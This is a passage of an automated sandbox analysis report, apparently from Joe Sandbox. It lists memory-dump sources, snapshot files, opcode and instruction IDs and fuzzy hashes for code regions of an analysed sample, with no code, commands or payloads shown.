                                                • Instruction Fuzzy Hash: 8FD0A73155E98A8FF785F738DC95854BFA0FF1F315B8914D6D04CC72A2E6458898C701
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 271586653325663e5d2bdd91e70cdf52aaf7d7727d5b400d15718369f6b310ea
                                                • Instruction ID: 3b5183bfb080e9c805c8a6deef68507040aa85030d3050aa8180667e1eda19c4
                                                • Opcode Fuzzy Hash: 271586653325663e5d2bdd91e70cdf52aaf7d7727d5b400d15718369f6b310ea
                                                • Instruction Fuzzy Hash: 1BD01251D0E7858BF72A07B8086217C1990CF17380B1946BBD64E4A2D3DA48A84D53F1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 81ae466a81060168832a95bd26208e155c34b5eb3ce03a8cdc84a81d7abfaa32
                                                • Instruction ID: 18fa5e335cc5411565b9101576e35b86de2b34eefa476ed7f49df9266e00d4b4
                                                • Opcode Fuzzy Hash: 81ae466a81060168832a95bd26208e155c34b5eb3ce03a8cdc84a81d7abfaa32
                                                • Instruction Fuzzy Hash: E5D0C241D0F385CBFB160778086107C1EC08F2734074686B7D64E8A2C3D849784853B2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 402d6a5b6bbe9d9c8722cad49b8aba14590f27e1a107421dd48995156ab57477
                                                • Instruction ID: bfc705868f8c84ea0d703618875c74e0c6c2d30173fb06875b6b98298978a72f
                                                • Opcode Fuzzy Hash: 402d6a5b6bbe9d9c8722cad49b8aba14590f27e1a107421dd48995156ab57477
                                                • Instruction Fuzzy Hash: 50D0C241E0F395CBF716037408A107C1E408F2B340B4542BAC71E8F2C3D849A94857A2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1639655376.00007FFAACB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacb20000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5fb563ff932bab96a508533161290ee70b2af8b2c8a9efdcd38df131b551d61b
                                                • Instruction ID: 897d3fb43bced04d0f2af4a06cab5ecb60f0e68fea3b11b800777255325aa907
                                                • Opcode Fuzzy Hash: 5fb563ff932bab96a508533161290ee70b2af8b2c8a9efdcd38df131b551d61b
                                                • Instruction Fuzzy Hash: 8BC01220D1B42A81F402332EA40A4ACA1005BE6610FD08232C40D40081FC0FA0CE02C6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1639655376.00007FFAACB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacb20000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 68a7ab50b5ac75bc4ec7db7105904607d2cebecb2b52a79f9562f041a2f087a1
                                                • Instruction ID: e3eab6fcd2bc7730865c0151c19c2e8fdf643a4ab08938554e1a9daa4b399714
                                                • Opcode Fuzzy Hash: 68a7ab50b5ac75bc4ec7db7105904607d2cebecb2b52a79f9562f041a2f087a1
                                                • Instruction Fuzzy Hash: 5BC04C345518198FDA48EB29C88591477A1FB1A215BD60090E40DC71B5E65ADCD5D781
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 38bd1c2b88e21f1fbb3ff350f7f03cce532cc83688eea358e5472ad9ffe2c8f1
                                                • Instruction ID: 5e6d856007520936b357fa0244d468234da30e21f7f8649b06a64a18c9fcb381
                                                • Opcode Fuzzy Hash: 38bd1c2b88e21f1fbb3ff350f7f03cce532cc83688eea358e5472ad9ffe2c8f1
                                                • Instruction Fuzzy Hash: 6ED0C910A0F793C6F6384B29817023D6591AF43700E34C43DCA9F939CACD1DF50D66A6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1639655376.00007FFAACB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacb20000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 290521726fa508155bf2113fcdfd249ee956fc44bd5d8a511c3f565414de60a1
                                                • Instruction ID: 936a5f01e119239d0035d081f96937e380f6e10f75f395c19c2b4cdc146ca324
                                                • Opcode Fuzzy Hash: 290521726fa508155bf2113fcdfd249ee956fc44bd5d8a511c3f565414de60a1
                                                • Instruction Fuzzy Hash: 13C08C81E0982A42F24AA724C01197E04434F40300F5040B8F00D863DADE0CAE0242CA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1639655376.00007FFAACB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacb20000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fe1920de24ded48acad937166f2596bba7f8d409a21fe85a8c27c69d34cdf37f
                                                • Instruction ID: 9993c3ea830830f662b54433cf8b88f71dd6a5642e0401b7fb4cee415be6aa5f
                                                • Opcode Fuzzy Hash: fe1920de24ded48acad937166f2596bba7f8d409a21fe85a8c27c69d34cdf37f
                                                • Instruction Fuzzy Hash: B7B01210C6741F80B404337E584606574405F46100FC05170D40E40081FC4F50DC13C2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1639655376.00007FFAACB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacb20000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: c9$!k9$"s9$#{9
                                                • API String ID: 0-1692736845
                                                • Opcode ID: 1939e9668d5026caf6ceb965e958b8423a673a0d037518731f8133d98397edeb
                                                • Instruction ID: 3a81153a7f5541ba3b638c88e871f1fd2001203c246811b6e7cf3495984f2f29
                                                • Opcode Fuzzy Hash: 1939e9668d5026caf6ceb965e958b8423a673a0d037518731f8133d98397edeb
                                                • Instruction Fuzzy Hash: 1C4165E7A0E56356E31133FEF0859ED9B449F83339B489677E54C890B3AF086485C2E9